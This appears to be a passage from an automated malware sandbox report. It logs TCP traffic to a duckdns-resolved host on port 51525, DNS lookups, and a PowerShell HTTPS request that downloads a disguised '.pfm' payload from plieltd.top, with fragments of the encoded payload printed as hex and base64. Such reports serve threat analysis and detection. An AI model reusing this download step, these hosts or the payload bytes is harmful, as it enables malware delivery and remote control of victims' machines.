                                                    Oct 22, 2024 07:05:41.937690973 CEST5013951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:41.941719055 CEST5013951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:41.946929932 CEST5152550139192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:42.927692890 CEST5152550139192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:42.927871943 CEST5013951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:42.928157091 CEST5013951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:42.933388948 CEST5152550139192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:42.962017059 CEST5014051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:42.967318058 CEST5152550140192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:42.967427969 CEST5014051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:42.970686913 CEST5014051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:42.975950956 CEST5152550140192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:43.808752060 CEST5152550140192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:43.809039116 CEST5014051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:43.809231997 CEST5014051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:43.814488888 CEST5152550140192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:43.852705956 CEST5014151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:43.858146906 CEST5152550141192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:43.858830929 CEST5014151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:43.865575075 CEST5014151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:43.870848894 CEST5152550141192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:44.669084072 CEST5152550141192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:44.669229984 CEST5014151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:44.669684887 CEST5014151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:44.675035000 CEST5152550141192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:44.712686062 CEST5014251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:44.717972040 CEST5152550142192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:44.718039036 CEST5014251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:44.723263979 CEST5014251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:44.728749990 CEST5152550142192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:45.639151096 CEST5152550142192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:45.641731024 CEST5014251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:45.643141031 CEST5014251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:45.648545980 CEST5152550142192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:45.680849075 CEST5014351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:45.686131954 CEST5152550143192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:45.692779064 CEST5014351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:45.692779064 CEST5014351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:45.698122025 CEST5152550143192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:46.550666094 CEST5152550143192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:46.550724983 CEST5014351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:46.551073074 CEST5014351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:46.556308031 CEST5152550143192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:46.587486029 CEST5014451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:46.592891932 CEST5152550144192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:46.592964888 CEST5014451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:46.596400023 CEST5014451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:46.601658106 CEST5152550144192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:47.554533005 CEST5152550144192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:47.557768106 CEST5014451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:47.558026075 CEST5014451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:47.563288927 CEST5152550144192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:47.587125063 CEST5014551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:47.592473984 CEST5152550145192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:47.593669891 CEST5014551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:47.597224951 CEST5014551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:47.602533102 CEST5152550145192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:48.479562998 CEST5152550145192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:48.479696035 CEST5014551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:48.480001926 CEST5014551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:48.485264063 CEST5152550145192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:48.509445906 CEST5014651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:48.514950991 CEST5152550146192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:48.515042067 CEST5014651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:48.518382072 CEST5014651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:48.523734093 CEST5152550146192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:49.438795090 CEST5152550146192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:49.441704035 CEST5014651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:49.442151070 CEST5014651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:49.447506905 CEST5152550146192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:49.479693890 CEST5014751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:49.485147953 CEST5152550147192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:49.485681057 CEST5014751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:49.585438013 CEST5014751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:49.590926886 CEST5152550147192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:50.326241016 CEST5152550147192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:50.326508999 CEST5014751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:50.326726913 CEST5014751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:50.332070112 CEST5152550147192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:50.352756023 CEST5014851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:50.358150005 CEST5152550148192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:50.358238935 CEST5014851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:50.362742901 CEST5014851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:50.368958950 CEST5152550148192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:51.318386078 CEST5152550148192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:51.321774960 CEST5014851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:51.322036028 CEST5014851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:51.327297926 CEST5152550148192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:51.352790117 CEST5014951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:51.358174086 CEST5152550149192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:51.359716892 CEST5014951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:51.362895012 CEST5014951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:51.368182898 CEST5152550149192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:52.378361940 CEST5152550149192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:52.378556967 CEST5014951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:52.378829002 CEST5014951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:52.385895967 CEST5152550149192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:52.416336060 CEST5015051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:52.421721935 CEST5152550150192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:52.425776958 CEST5015051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:52.428894997 CEST5015051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:52.434195042 CEST5152550150192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:53.130547047 CEST5152550150192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:53.130616903 CEST5015051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:53.130989075 CEST5015051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:53.136238098 CEST5152550150192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:53.165333033 CEST5015151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:53.170677900 CEST5152550151192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:53.170768023 CEST5015151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:53.174083948 CEST5015151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:53.179339886 CEST5152550151192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:54.114074945 CEST5152550151192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:54.114166021 CEST5015151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.114768982 CEST5015151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.120074034 CEST5152550151192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:54.149717093 CEST5015251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.154992104 CEST5152550152192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:54.155066967 CEST5015251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.159167051 CEST5015251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.164479971 CEST5152550152192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:54.869636059 CEST5152550152192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:54.869746923 CEST5015251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.870203018 CEST5015251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.875436068 CEST5152550152192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:54.901639938 CEST5015351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.907010078 CEST5152550153192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:54.911339045 CEST5015351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.914535999 CEST5015351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:54.919888020 CEST5152550153192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:55.842247009 CEST5152550153192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:55.842339993 CEST5015351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:55.842787981 CEST5015351525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:55.848063946 CEST5152550153192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:55.868475914 CEST5015451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:55.873750925 CEST5152550154192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:55.873812914 CEST5015451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:55.878855944 CEST5015451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:55.884150028 CEST5152550154192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:56.609743118 CEST5152550154192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:56.610317945 CEST5015451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:56.610317945 CEST5015451525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:56.615670919 CEST5152550154192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:56.637809992 CEST5015551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:56.643095970 CEST5152550155192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:56.643374920 CEST5015551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:56.648819923 CEST5015551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:56.654088020 CEST5152550155192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:57.467881918 CEST5152550155192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:57.467967033 CEST5015551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:57.468570948 CEST5015551525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:57.473820925 CEST5152550155192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:57.493598938 CEST5015651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:57.498975992 CEST5152550156192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:57.499067068 CEST5015651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:57.502466917 CEST5015651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:57.507806063 CEST5152550156192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:58.313993931 CEST5152550156192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:58.314059973 CEST5015651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:58.316509008 CEST5015651525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:58.321839094 CEST5152550156192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:58.352022886 CEST5015751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:58.357352972 CEST5152550157192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:58.357426882 CEST5015751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:58.394383907 CEST5015751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:58.399697065 CEST5152550157192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:59.827811956 CEST5152550157192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:59.827990055 CEST5015751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:59.828077078 CEST5152550157192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:59.828286886 CEST5015751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:59.828286886 CEST5015751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:59.828521013 CEST5152550157192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:59.828620911 CEST5015751525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:59.837467909 CEST5152550157192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:59.863993883 CEST5015851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:59.872006893 CEST5152550158192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:05:59.872095108 CEST5015851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:59.879122019 CEST5015851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:05:59.889666080 CEST5152550158192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:00.769299984 CEST5152550158192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:00.769366026 CEST5015851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:00.769862890 CEST5015851525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:00.775171995 CEST5152550158192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:00.791095018 CEST5015951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:00.796482086 CEST5152550159192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:00.796572924 CEST5015951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:00.800299883 CEST5015951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:00.807709932 CEST5152550159192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:01.749063015 CEST5152550159192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:01.749212980 CEST5015951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:01.749623060 CEST5015951525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:01.754848003 CEST5152550159192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:01.774979115 CEST5016051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:01.780910969 CEST5152550160192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:01.780978918 CEST5016051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:01.785407066 CEST5016051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:01.791220903 CEST5152550160192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:02.672872066 CEST5152550160192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:02.672930002 CEST5016051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:02.673621893 CEST5016051525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:02.678870916 CEST5152550160192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:02.696888924 CEST5016151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:02.702868938 CEST5152550161192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:02.702958107 CEST5016151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:02.707693100 CEST5016151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:02.713498116 CEST5152550161192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:03.671916962 CEST5152550161192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:03.673762083 CEST5016151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:05.485037088 CEST5016151525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:05.490438938 CEST5152550161192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:06.495338917 CEST5016251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:06.500741959 CEST5152550162192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:06.503335953 CEST5016251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:06.505732059 CEST5016251525192.168.2.4192.169.69.26
                                                    Oct 22, 2024 07:06:06.723669052 CEST5152550162192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:07.602351904 CEST5152550162192.169.69.26192.168.2.4
                                                    Oct 22, 2024 07:06:07.602449894 CEST5016251525192.168.2.4192.169.69.26

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 22, 2024 07:01:59.460773945 CEST5969053192.168.2.41.1.1.1
                                                    Oct 22, 2024 07:01:59.864358902 CEST53596901.1.1.1192.168.2.4
                                                    Oct 22, 2024 07:02:36.576734066 CEST4996553192.168.2.41.1.1.1
                                                    Oct 22, 2024 07:02:36.707444906 CEST53499651.1.1.1192.168.2.4
                                                    Oct 22, 2024 07:03:37.336703062 CEST5477853192.168.2.41.1.1.1
                                                    Oct 22, 2024 07:03:37.463269949 CEST53547781.1.1.1192.168.2.4
                                                    Oct 22, 2024 07:04:37.711889982 CEST4945653192.168.2.41.1.1.1
                                                    Oct 22, 2024 07:04:37.845662117 CEST53494561.1.1.1192.168.2.4
                                                    Oct 22, 2024 07:05:37.258898020 CEST6002753192.168.2.41.1.1.1
                                                    Oct 22, 2024 07:05:37.376764059 CEST53600271.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 22, 2024 07:01:59.460773945 CEST192.168.2.41.1.1.10xe8d0Standard query (0)plieltd.topA (IP address)IN (0x0001)false
                                                    Oct 22, 2024 07:02:36.576734066 CEST192.168.2.41.1.1.10xc2caStandard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                    Oct 22, 2024 07:03:37.336703062 CEST192.168.2.41.1.1.10xc877Standard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                    Oct 22, 2024 07:04:37.711889982 CEST192.168.2.41.1.1.10xbb57Standard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                    Oct 22, 2024 07:05:37.258898020 CEST192.168.2.41.1.1.10x9345Standard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 22, 2024 07:01:59.864358902 CEST1.1.1.1192.168.2.40xe8d0No error (0)plieltd.top104.21.56.189A (IP address)IN (0x0001)false
                                                    Oct 22, 2024 07:01:59.864358902 CEST1.1.1.1192.168.2.40xe8d0No error (0)plieltd.top172.67.155.139A (IP address)IN (0x0001)false
                                                    Oct 22, 2024 07:02:36.707444906 CEST1.1.1.1192.168.2.40xc2caNo error (0)pelele.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                    Oct 22, 2024 07:03:37.463269949 CEST1.1.1.1192.168.2.40xc877No error (0)pelele.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                    Oct 22, 2024 07:04:37.845662117 CEST1.1.1.1192.168.2.40xbb57No error (0)pelele.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                    Oct 22, 2024 07:05:37.376764059 CEST1.1.1.1192.168.2.40x9345No error (0)pelele.duckdns.org192.169.69.26A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • plieltd.top

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449730104.21.56.1894437128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-22 05:02:00 UTC170OUTGET /Misogynists.pfm HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: plieltd.top
                                                    Connection: Keep-Alive
                                                    2024-10-22 05:02:01 UTC916INHTTP/1.1 200 OK
                                                    Date: Tue, 22 Oct 2024 05:02:01 GMT
                                                    Content-Length: 498852
                                                    Connection: close
                                                    Last-Modified: Tue, 22 Oct 2024 01:18:51 GMT
                                                    ETag: "79ca4-625068d57ef17"
                                                    Accept-Ranges: bytes
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7B0OIBXDo0YSm5poNm2hQQ2QPzHXhzqSc6KE9RfxZgNYZo%2FVj5ZIPra5Xy%2FnFZVT4NVUBe8CyPgggQsK6W%2F32luJ9PQ3cIHhtc%2BLJf9KY0jX%2FprU7e9M6s96BguYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                    X-Content-Type-Options: nosniff
                                                    Server: cloudflare
                                                    CF-RAY: 8d66eec6bb5ca91e-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1066&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=784&delivery_rate=2644748&cwnd=252&unsent_bytes=0&cid=f0e80e91ce6765ad&ts=680&x=0"
                                                    2024-10-22 05:02:01 UTC453INData Raw: 63 51 47 62 36 77 4c 32 50 4c 76 39 59 52 4d 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 48 45 42 6d 2b 73 43 4e 62 47 35 69 35 75 7a 72 48 45 42 6d 2b 73 43 6d 45 69 42 38 66 6f 4c 52 78 68 78 41 5a 76 72 41 6a 6e 7a 67 63 47 50 62 77 74 4c 63 51 47 62 63 51 47 62 63 51 47 62 63 51 47 62 75 70 4b 65 36 53 72 72 41 6c 5a 34 36 77 4b 6b 53 4f 73 43 34 61 33 72 41 69 5a 39 4d 63 70 78 41 5a 74 78 41 5a 75 4a 46 41 76 72 41 70 64 4a 63 51 47 62 30 65 4a 78 41 5a 76 72 41 6d 44 57 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6e 44 45 4a 38 45 66 4d 78 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 63 51 47 62 36 77 4b 71 6e 49 6e 44 36 77 4b 2b 45 75 73 43 47 34 6d 42 77 36 79 6b 57 77 48 72 41 6e 72 32 36 77 4b 30 61 72 70 2b 64 75 43 56 36 77 4c 4d 34 4f 73 43 53 33 69
                                                    Data Ascii: cQGb6wL2PLv9YRMAcQGbcQGbA1wkBHEBm+sCNbG5i5uzrHEBm+sCmEiB8foLRxhxAZvrAjnzgcGPbwtLcQGbcQGbcQGbcQGbupKe6SrrAlZ46wKkSOsC4a3rAiZ9McpxAZtxAZuJFAvrApdJcQGb0eJxAZvrAmDWg8EEcQGbcQGbgfnDEJ8EfMxxAZtxAZuLRCQEcQGb6wKqnInD6wK+EusCG4mBw6ykWwHrAnr26wK0arp+duCV6wLM4OsCS3i
                                                    2024-10-22 05:02:01 UTC1369INData Raw: 33 72 72 41 72 30 54 55 2b 73 43 63 37 54 72 41 67 4b 6d 61 6b 42 78 41 5a 76 72 41 67 33 75 69 65 74 78 41 5a 76 72 41 6b 78 53 78 34 4d 41 41 51 41 41 41 49 43 31 42 48 45 42 6d 33 45 42 6d 34 48 44 41 41 45 41 41 4f 73 43 76 34 62 72 41 6b 69 38 55 33 45 42 6d 33 45 42 6d 34 6e 72 36 77 4c 64 71 58 45 42 6d 34 6d 37 42 41 45 41 41 4f 73 43 4e 7a 68 78 41 5a 75 42 77 77 51 42 41 41 44 72 41 6a 41 6b 36 77 49 53 6a 6c 4e 78 41 5a 74 78 41 5a 74 71 2f 2b 73 43 45 79 44 72 41 6a 42 42 67 38 49 46 63 51 47 62 36 77 49 31 4f 44 48 32 36 77 49 57 44 48 45 42 6d 7a 48 4a 63 51 47 62 36 77 49 61 6b 49 73 61 36 77 4b 4a 6d 2b 73 43 47 7a 46 42 36 77 49 64 68 65 73 43 50 77 45 35 48 41 70 31 38 6e 45 42 6d 2b 73 43 35 61 52 47 36 77 4a 49 4c 33 45 42 6d 34 42 38
                                                    Data Ascii: 3rrAr0TU+sCc7TrAgKmakBxAZvrAg3uietxAZvrAkxSx4MAAQAAAIC1BHEBm3EBm4HDAAEAAOsCv4brAki8U3EBm3EBm4nr6wLdqXEBm4m7BAEAAOsCNzhxAZuBwwQBAADrAjAk6wISjlNxAZtxAZtq/+sCEyDrAjBBg8IFcQGb6wI1ODH26wIWDHEBmzHJcQGb6wIakIsa6wKJm+sCGzFB6wIdhesCPwE5HAp18nEBm+sC5aRG6wJIL3EBm4B8
                                                    2024-10-22 05:02:01 UTC1369INData Raw: 6a 44 6c 4e 61 66 6b 55 4b 34 2f 66 69 75 49 4d 61 6f 74 58 77 68 71 41 6b 67 64 71 2b 4c 58 48 77 72 71 53 6a 77 72 6d 35 33 65 53 75 6e 7a 6f 70 68 2f 56 4c 34 36 67 61 75 57 63 64 33 68 6e 65 37 41 72 7a 34 32 73 6e 61 7a 74 78 33 74 6c 66 4d 5a 71 55 75 74 33 2b 51 63 43 52 72 38 71 5a 66 38 58 39 75 51 43 78 74 50 58 75 73 4d 37 4e 55 47 68 2f 39 72 74 35 65 39 31 31 2f 71 63 52 70 38 39 31 6c 6e 46 74 44 38 41 52 6b 65 63 58 45 59 48 78 59 61 54 64 41 6f 4d 70 43 67 4c 73 52 52 34 4d 4d 64 48 4f 38 49 48 78 4a 65 4f 6b 49 77 76 61 4f 5a 53 48 76 64 4b 6f 42 44 52 7a 70 76 66 61 57 45 4e 63 4f 43 33 6c 71 2f 70 73 71 7a 4f 70 41 34 6f 4e 67 4a 63 43 31 6b 58 65 47 50 61 44 6b 47 58 64 7a 6d 39 50 65 32 4e 62 67 47 56 58 54 48 42 41 77 59 72 34 72 30
                                                    Data Ascii: jDlNafkUK4/fiuIMaotXwhqAkgdq+LXHwrqSjwrm53eSunzoph/VL46gauWcd3hne7Arz42snaztx3tlfMZqUut3+QcCRr8qZf8X9uQCxtPXusM7NUGh/9rt5e911/qcRp891lnFtD8ARkecXEYHxYaTdAoMpCgLsRR4MMdHO8IHxJeOkIwvaOZSHvdKoBDRzpvfaWENcOC3lq/psqzOpA4oNgJcC1kXeGPaDkGXdzm9Pe2NbgGVXTHBAwYr4r0
